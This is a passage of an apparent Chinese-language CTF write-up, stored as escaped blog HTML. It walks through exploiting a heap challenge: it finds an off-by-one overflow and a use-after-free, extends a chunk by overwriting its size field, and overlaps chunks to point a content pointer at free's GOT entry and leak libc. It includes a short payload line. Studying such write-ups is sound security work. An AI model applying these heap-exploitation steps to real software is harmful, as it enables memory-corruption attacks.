id=\"u338180d3\">\u5148\u770b1\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/5322G2R_QBIU8XNB2ZC5.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"998\" height=\"908\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/5322G2R_QBIU8XNB2ZC5.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-228\"  sizes=\"auto, (max-width: 998px) 100vw, 998px\" \/><\/div><\/figure>\n\n\n\n<p 
id=\"ud03edbf8\">\u7ed3\u5408\u4e4b\u524d\u7684\u77e5\u8bc6\uff0c\u53ef\u4ee5\u5927\u6982\u63a8\u7b97\u51fa\u8fd9\u6837\u4e00\u4e2a\u7ed3\u6784\u4f53\u6570\u7ec4\uff0cheaparray[n]\u662f\u4e2a\u6307\u9488\u6570\u7ec4\uff0c\u6bcf\u4e2a\u6307\u9488\u6307\u5411\u4e00\u4e2a\u7ed3\u6784\u4f53heap\u3002\u6bcf\u4e2aheap\u670916B\uff0c\u5176\u4e2d\u4e00\u4e2a8B\u662f\u6307\u9488\uff0c\u6307\u5411\u4e00\u4e2a\u5b57\u7b26\u4e32\uff0c\u4e5f\u5c31\u662f\u5806\u7684content\uff0c\u5269\u4e0b\u76848B\u662f\u4e2a\u6574\u578b\u53d8\u91cf\uff0c\u4ee3\u8868content\u7684\u5927\u5c0f<\/p>\n\n\n\n<p id=\"u00a67ce9\">\u8f6c\u6362C\u4ee3\u7801\uff1a<\/p>\n\n\n\n<p id=\"u4fe06c87\">heap{<\/p>\n\n\n\n<p id=\"u2db7186e\">size_t size<\/p>\n\n\n\n<p id=\"u737d4d6c\">char *content<\/p>\n\n\n\n<p id=\"u2fec323d\">}<\/p>\n\n\n\n<p id=\"u8c79ed75\">\u518d\u770b\u770bedit:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/MSNHEJTJY7NFRE68ZQV-1024x534.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"534\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/MSNHEJTJY7NFRE68ZQV-1024x534.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-229\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u67b2643b\">\u6539\u53d8content\u7684\u5185\u5bb9\uff0c\u4f46\u662f\u53d1\u73b0\u5b83\u8fd9\u91cc\u53ef\u4ee5\u591a\u5199\u4e00\u4e2a\u5b57\u8282\uff0c\u5b58\u5728off by one\u6ea2\u51fa<\/p>\n\n\n\n<p 
id=\"u25bf18cf\">show\u51fd\u6570\uff1a<\/p>\n\n\n\n<p id=\"u3bc83d06\">\u6253\u5370size\u548ccontent\u5185\u5bb9<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/ATXZ9F@NDS85Q2W2.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"894\" height=\"735\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/ATXZ9F@NDS85Q2W2.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-230\"  sizes=\"auto, (max-width: 894px) 100vw, 894px\" \/><\/div><\/figure>\n\n\n\n<p id=\"ue07c70f8\">delete\u51fd\u6570:<\/p>\n\n\n\n<p id=\"ub23865dc\">\u5148\u540efree\u6389content\u6307\u9488\u548c\u7ed3\u6784\u4f53\u672c\u8eab\uff0c\u7136\u540e\u628a\u7ed3\u6784\u4f53\u6307\u9488\u7f6e\u7a7a\uff0c\u4f46\u662fcontent\u6307\u9488\u5e76\u6ca1\u6709\u7f6e\u7a7a\uff0c\u5b58\u5728UAF<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/JQJFLL8EMJA95SD5ZBIF.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"842\" height=\"732\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/JQJFLL8EMJA95SD5ZBIF.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-231\"  sizes=\"auto, (max-width: 842px) 100vw, 842px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u7916138b\">\u540c\u65f6\uff0c\u6ca1\u6709\u540e\u95e8\u51fd\u6570\u3002<\/p>\n\n\n\n<p id=\"u00917dca\">\u7531\u4e8eoff by one\uff0c\u8003\u8651heap extend<\/p>\n\n\n\n<p id=\"u40f0dfd8\">heap extend\u9700\u8981\u8986\u76d6\u4e0b\u4e00\u4e2achunk\u7684size\u5b57\u6bb5\uff0c\u4e5f\u5c31\u610f\u5473\u7740\u9700\u8981\u89e6\u53d1prev size\u590d\u7528\uff0c\u4e0d\u7136\u6ea2\u51fa\u5c31\u53ea\u80fd\u6ea2\u51fa\u5230prev size\u53bb<\/p>\n\n\n\n<p id=\"ud893614f\">\u89e6\u53d1prev size\u590d\u7528\u7684\u6761\u4ef6\uff08\u975e\u5e38\u91cd\u8981\uff09\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/SIMJDAPULT2WS1DT_V0-2-1024x464.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"464\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/SIMJDAPULT2WS1DT_V0-2-1024x464.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-234\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p 
id=\"u1fbdc041\">\u53ea\u6709\u5bf916\u53d6\u4f59\u540e\uff0c\u591a\u51fa\u6765\u7684\u5b57\u8282\u5c0f\u4e8e\u7b49\u4e8e8B\uff0c\u624d\u4f1a\u653e\u5165\u4e0b\u4e00\u4e2achunk\u7684prevsize\uff01<\/p>\n\n\n\n<p id=\"u8d230297\">\u6240\u4ee5\u7b2c\u4e00\u4e2achunk\u7684size\u9700\u8981\u8bbe\u7f6e\u4e3a0x18(0x28,0x38\u8fd9\u4e9b\u5176\u5b9e\u90fd\u53ef\u4ee5)\uff0c\u7b2c\u4e8c\u4e2achunk\u8bbe\u7f6e\u4e3a0x10<\/p>\n\n\n\n<p id=\"u7e6ed027\">\u5c24\u5176\u9700\u8981\u6ce8\u610f\u7684\u662f\uff0c\u5728create\u64cd\u4f5c\u65f6\u5019\uff0c\u5b9e\u9645\u4e0a\u6bcf\u6b21\u90fd\u7533\u8bf7\u4e86\u4e24\u4e2achunk\uff0c\u4e00\u4e2a\u662f\u7ed3\u6784\u4f53\uff0c\u4e00\u4e2a\u662fcontent\u5185\u5bb9\u6307\u9488\uff0c\u8bbe\u7f6e\u7684size\u5927\u5c0f\u5b9e\u9645\u4e0a\u662fcontent\u6307\u9488\u7684\uff0c\u7531\u4e8e\u7533\u8bf7\u7684chunk\u662f\u7d27\u6328\u7740\u7684\uff0c\u6240\u4ee5\u5806\u5185\u5b58\u5982\u4e0b\u6240\u793a\uff1a<\/p>\n\n\n\n<p id=\"ucbfe6a92\">\uff08\u7531\u4e8e\u7248\u672c\u539f\u56e0\uff0c\u6211\u5728\u521b\u5efachunk\u65f6\u5019\u4e00\u5f00\u59cb\u4f1a\u81ea\u52a8\u521b\u5efa\u4e00\u4e2a0x290\u7684chunk\uff09<img decoding=\"async\" width=\"338\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/47670780\/1731386009726-9af17eca-c39a-4a75-8923-16a995f94b72.png\"><\/p>\n\n\n\n<p id=\"u4384b3cc\">\u4e0d\u5f71\u54cd\uff0c\u521b\u5efa\u4e24\u4e2achunk\u540e<code>x\/20gx + \u5730\u5740<\/code>\u67e5\u770b\u4e00\u4e0b<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/B878MQDYMLKK@5NRJS.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"960\" height=\"275\" 
data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/B878MQDYMLKK@5NRJS.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-237\"  sizes=\"auto, (max-width: 960px) 100vw, 960px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u7752bc13\">\u91cd\u590d\u6d4b\u8bd5\u4f1a\u53d1\u73b0\uff0c\u6709\u65f6\u5019content\u5927\u5c0f\u5206\u914d\u7684\u4e0d\u662f0x10,\u6700\u540e\u4e5f\u4f1a\u5f97\u5230\u4e00\u4e2a0x20\u7684chunk\uff0c\u8fd9\u662f\u7531\u4e8e\u5806\u5206\u914d\u7684\u5bf9\u9f50\u673a\u5236<\/p>\n\n\n\n<p id=\"u56beac85\">\u7ed9chunk1\u7684content\u7684size\u5927\u5c0f\u662f24\uff0cchunk2\u7684content\u7684size\u5927\u5c0f\u662f16\uff0c\u4e4b\u6240\u4ee5\u8fd9\u4e48\u5206\u914d\uff0c\u662f\u56e0\u4e3a26\u5bf916\u53d6\u4f59\u521a\u597d\u662f8\uff0c\u5c31\u4f1a\u628a\u4e0b\u4e00\u4e2achunk\u7684prevsize\u5360\u7528\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/RKD1CBM77_CPP_RGN9PNY.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"600\" height=\"257\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/RKD1CBM77_CPP_RGN9PNY.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-238\"  sizes=\"auto, (max-width: 600px) 100vw, 600px\" \/><\/div><\/figure>\n\n\n\n<p id=\"ue23ae241\">edit 
chunk1\uff0c\u8f93\u516525\u4e2af\uff08\u537366\uff09\uff0c\u53ef\u4ee5\u770b\u5230chunk2\u7ed3\u6784\u4f53\u7684size\u5df2\u7ecf\u88ab\u8986\u76d6<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/GFSBQC9EOQISA9NLO.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"621\" height=\"219\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/GFSBQC9EOQISA9NLO.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-239\"  sizes=\"auto, (max-width: 621px) 100vw, 621px\" \/><\/div><\/figure>\n\n\n\n<p id=\"uf3c5d7a7\">\u8fd9\u6837\u5c31\u80fd\u901a\u8fc7\u4fee\u6539size\u5927\u5c0f\u5b9e\u73b0chunk extend\uff0c\u628achunk2\u7ed3\u6784\u4f53\u548cchunk2content\u5408\u5e76\u3002<\/p>\n\n\n\n<p 
id=\"u2c1129a1\">\u7531\u4e8e\u6ca1\u6709system\u51fd\u6570\uff0c\u6240\u4ee5\u9700\u8981\u901a\u8fc7libc\u65b9\u5f0f\u6cc4\u9732\uff0c\u627e\u5230\u51fd\u6570\u539f\u6709\u7684plt\u51fd\u6570\uff0c\u8fd9\u91cc\u7528free\u51fd\u6570\u3002\u9996\u5148\u5148\u6e05\u695a\u6211\u4eec\u9700\u8981\u5728\u4ec0\u4e48\u5730\u65b9\u624d\u80fd\u6cc4\u9732\uff1a\u5fc5\u987b\u628acontent\u6307\u9488\uff08\u5730\u5740\uff09\u6539\u6210free_got\u5730\u5740\u624d\u80fd\u6cc4\u9732\uff0c\u6709\u53ef\u80fd\u4f1a\u7591\u60d1\uff0c\u4e3a\u4ec0\u4e48\u4e0d\u80fd\u628afree_got\u5199\u5165content\u7533\u8bf7\u7684\u5185\u5bb9\u91cc\u9762\u6253\u5370\u51fa\u6765\uff1f\u56e0\u4e3a\u8fd9\u6837\u6253\u5370\u5b9e\u9645\u4e0a\u6253\u5370\u51fa\u6765\u7684\u662ffree_got\u7684\u5730\u5740\uff0c\u800cfree_got\u5b58\u7684\u503c\u624d\u662ffree\u7684\u771f\u5b9e\u5730\u5740\uff01\u6240\u4ee5\u5f97\u628afree_got\u8986\u76d6content\u6307\u9488\uff0c\u8fd9\u6837\u6253\u5370\u51fa\u6765\u7684\u5185\u5bb9\u624d\u662ffree\u7684\u771f\u5b9e\u5730\u5740\uff01<\/p>\n\n\n\n<p id=\"udc8bd659\">\u4f46\u662f\u9898\u76ee\u4e2d\uff0c\u5728\u7533\u8bf7chunk\u65f6\u5019\u5c31\u4f1a\u9ed8\u8ba4\u7ed9content\u6307\u9488malloc\u4e00\u4e2a\u65b0\u5730\u5740\uff0c\u600e\u4e48\u529e\uff1f\u8fd9\u65f6\u5019chunk 
extend\u5c31\u5927\u663e\u795e\u901a\u4e86\u3002\u5982\u679c\u6211\u4eec\u628achunk2\u7684\u7ed3\u6784\u4f53\u548c\u5b83\u7684content\u5408\u5e76\u4e86\uff0c\u7136\u540e\u7533\u8bf7\u4e00\u4e2a\u65b0\u7684chunk3\uff0c\u9996\u5148\u6211\u4eec\u5f97\u5230chunk3\u7684\u7ed3\u6784\u4f53\uff0c\u7136\u540e\u628a\u5b83\u7684content\u7533\u8bf7\u7684\u6307\u9488\u7684\u5185\u5b58\u5927\u5c0f\uff08size\uff09\u7533\u8bf7\u6210\u7b49\u4e8e\u5408\u5e76\u540echunk2\u5927\u5c0f\u7684\u503c\uff0c\u5c31\u4f1a\u628a\u5408\u5e76\u7684chunk2\u5206\u914d\u7ed9\u6211\u4eec\uff0c\u8fd9\u4e2a\u65f6\u5019\u4fee\u6539chunk3\u7684content\u5185\u5bb9\uff0c\u5c31\u80fd\u4fee\u6539\u5230chunk2\u7684content\u6307\u9488\uff0c\u6ce8\u610f\u5230delete\u91cc\u9762chunk2\u7684content\u6307\u9488\u5e76\u6ca1\u6709\u7f6e\u7a7a\uff01\u8fd9\u5c31\u662f\u4f0f\u7b14\u4e86\uff0c\u7136\u540e\u6211\u4eec\u518d\u6253\u5370chunk2\uff0c\u5c31\u80fd\u628afree\u7684\u5730\u5740\u6253\u5370\u51fa\u6765<\/p>\n\n\n\n<p id=\"u060516a2\">\u5173\u4e8e\u4fee\u6539chunk2\u7ed3\u6784\u4f53\u7684size\u4e3a\u4ec0\u4e48\u662f0x41,\u4e00\u4e2achunk2\u7ed3\u6784\u4f53\u4f1a\u81ea\u52a8malloc(0x10)\uff0c\u5176\u4e2d\u5305\u542b\u4e24\u4e2a8B\u7684\u6210\u5458\uff0c\u52a0\u4e0asize\u548cprevsize\u8fd8\u6709\u6807\u5fd7\u4f4d\u76841B\uff0c\u4e00\u5171\u5c31\u662f0x21,\u7136\u540e\u5b83\u7684content\u7533\u8bf7\u7684\u662f0x10,\u5176\u5b9e\u4e5f\u662f0x21,\u90a3\u4e3a\u4ec0\u4e48\u4e0d\u6539\u62100x42\u800c\u662f0x41?\uff0c\u8fd9\u91cc\u6211\u89c9\u5f97\u6709\u4e24\u539f\u56e0\uff0c\u4e00\u4e2a\u662f\u4e0d\u9700\u8981\u5b8c\u5168\u56ca\u62eccontent\uff0c\u56e0\u4e3a\u8fd9\u4e48\u505a\u7684\u76ee\u7684\u5b8c\u5168\u662f\u4e3a\u4e86\u8ba9chunk3\u7684content\u80fd\u62ff\u5230\u542b\u6709chunk2\u7ed3\u6784\u4f53\u7684\u5185\u5b58\uff0c\u5982\u679c\u4e0d\u6539\u53d8chunk2\u7ed3\u6784\u4f53\u7684\u5927\u5c0f\uff0c\u7533\u8bf7chunk3\u65f6\u5019chunk3\u7ed3\u6784\u4f53\u5c31\u4f1a\u5148\u4e00\u6b65\u5360\u7528chunk2\u7ed3\u6784\u4f53\uff0c
\u8fd9\u6837content\u5c31\u62ff\u4e0d\u5230chunk2\u7ed3\u6784\u4f53\u4e86\uff0c\u800c\u6539\u53d8chunk2\u7ed3\u6784\u4f53\u5927\u5c0f\u540e\uff0cchunk3\u7684\u7ed3\u6784\u4f53\u5c06\u7533\u8bf7\u4e0d\u5230chunk2\u7ed3\u6784\u4f53\uff0c\u8fd9\u6837chunk3\u7684content\u5c31\u80fd\u62ff\u5230chunk2\u7ed3\u6784\u4f53\u4e86\u3002<\/p>\n\n\n\n<p id=\"ub51f5728\">\u4e8c\u53ef\u80fd\u662f\u7531\u4e8e\u5806\u7684\u5bf9\u9f50\u673a\u5236\u5427\u3002<\/p>\n\n\n\n<p id=\"ufc07ae21\">\u4f46\u662f\u4ec5\u4ec5\u505a\u5230\u7528chunk3\u7684content\u62ff\u5230chunk2\u7684\u7ed3\u6784\u4f53\u8fd8\u4e0d\u884c\uff0c\u56e0\u4e3a\u8981\u6253\u5370\u51fa\u6765\uff0c\u800c\u6253\u5370\u51fd\u6570\u662f\u6253\u5370\u67d0\u4e2achunk\u7ed3\u6784\u4f53\u7684size\u548ccontent\u6307\u9488\u5185\u5bb9\u3002\u867d\u7136\u6211\u4eec\u4fee\u6539\u4e86chunk2\u7ed3\u6784\u4f53\u7684content\u6307\u9488\uff0c\u4f46\u662fchunk2\u7ed3\u6784\u4f53\u5df2\u7ecf\u88abfree\u6389\u800c\u4e14\u7f6e\u7a7a\u4e86\uff01\u6b64\u65f6\u7d22\u5f151\u4e0d\u662fchunk2\u7ed3\u6784\u4f53\uff0c\u800c\u662fchunk3\u7ed3\u6784\u4f53\u3002\u6240\u4ee5\u6211\u4eec\u6539chunk2\u7ed3\u6784\u4f53\u7684content\u6307\u9488\u6ca1\u7528\uff0c\u5fc5\u987b\u6539chunk3\u7ed3\u6784\u4f53\u7684content\u6307\u9488\uff01<\/p>\n\n\n\n<p id=\"u360af99a\">\u90a3\u80fd\u4e0d\u80fd\u505a\u5230\u5462\uff1f<\/p>\n\n\n\n<p id=\"u934100af\">\u5f53\u7136\u53ef\u4ee5\uff0c\u8fd9\u5c31\u662f\u9700\u8981\u5de7\u5999\u6784\u9020\u4e86\u3002\u6211\u4eec\u7ed9chunk2\u7684content\u7533\u8bf7\u7684\u5927\u5c0f\u662f0x10,\u8fd9\u5c31\u5bfc\u81f4content\u7684\u5927\u5c0f\u8ddf\u7ed3\u6784\u4f53\u7684\u5927\u5c0f\u4e00\u81f4\uff0c\u7136\u540echunk 
extend\u628achunk2\u7ed3\u6784\u4f53\u548ccontent\u5408\u5e76\uff0c\u7136\u540efree\u6389\uff0c\u6b64\u65f6\u7533\u8bf7\u4e00\u4e2achunk3\uff0cbin\u91cc\u9762\u53ef\u4f9b\u4f7f\u7528\u7684chunk\u6709\u4e24\u4e2a\uff0c\u4e00\u4e2a\u5927\u5c0f0x41,\u4e00\u4e2a\u5927\u5c0f0x21,\uff08\u6709\u91cd\u53e0\uff09\u800cchunk3\u7684\u7ed3\u6784\u4f53\u7531\u4e8e\u4e5f\u662f0x21,\u6240\u4ee5\u5c31\u4f1a\u62ff\u5230chunk2\u7684content\u90e8\u5206\uff0c\u5b83\u88ab\u5305\u542b\u5728chunk2\u7ed3\u6784\u4f53\u76840x41\u4e2d\uff0c\u800c\u518d\u7533\u8bf7chunk3\u7684content\u7684\u5927\u5c0f\u5982\u679c\u7533\u8bf70x30(0x31 include flag)\uff0c\u5c31\u4f1a\u62ff\u5230chunk2\u7684\u7ed3\u6784\u4f53\u3002<\/p>\n\n\n\n<p id=\"u2bfe3605\">\u5982\u56fe\u6240\u793a\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/48V0FMHY67XVZEDZMG.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"495\" height=\"209\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/48V0FMHY67XVZEDZMG.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-240\"  sizes=\"auto, (max-width: 495px) 100vw, 495px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u670c2106\">\u5927\u7ea2\u6846\u662fchunk2\u7ed3\u6784\u4f53\/chunk3 content<\/p>\n\n\n\n<p id=\"uf37f484f\">\u5c0f\u84dd\u6846\u662fchunk2content\/chunk3 \u7ed3\u6784\u4f53<\/p>\n\n\n\n<p id=\"u8ce76cce\">\u800c\u6211\u4eec\u80fd\u4fee\u6539\u7684\u662fchunk3 
content\uff0c\u53ef\u4ee5\u53d1\u73b0\uff0c\u5b83\u53ef\u4ee5\u4fee\u6539\u5230chunk3 \u7684\u7ed3\u6784\u4f53<\/p>\n\n\n\n<p id=\"u0bd60b89\">payload2=p64(0)+p64(0)+p64(0)(prevsize)+p64(21)(size)+p64(30)(chunk\u6210\u5458size)+p64(free_got)<\/p>\n\n\n\n<p id=\"u51c15238\">payload2=p64(0)+p64(0)+p64(0)+p64(21)+p64(30)+p64(free_got)<\/p>\n\n\n\n<p id=\"u448d89da\">\u7136\u540e\u518dshow(1)\uff0c\u5c31\u4f1a\u6253\u5370\u51fa\u6765chunk3\u7684size\u6210\u5458\u548ccontent\u6210\u5458\u7684\u503c\uff0ccontent\u6210\u5458\u4ee5\u53ca\u88ab\u6211\u4eec\u8986\u76d6\u6210\u4e86free_got\uff0c\u5c31\u80fd\u6cc4\u9732free_got\u5730\u5740\uff01<\/p>\n\n\n\n<p id=\"uc854e97b\">\u52a8\u6001\u8c03\u8bd5\u4e00\u4e0b\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/47670780\/1731387748096-417fdaed-0928-4b65-b5af-f40b09b09d7c.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/47670780\/1731387748096-417fdaed-0928-4b65-b5af-f40b09b09d7c.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<p 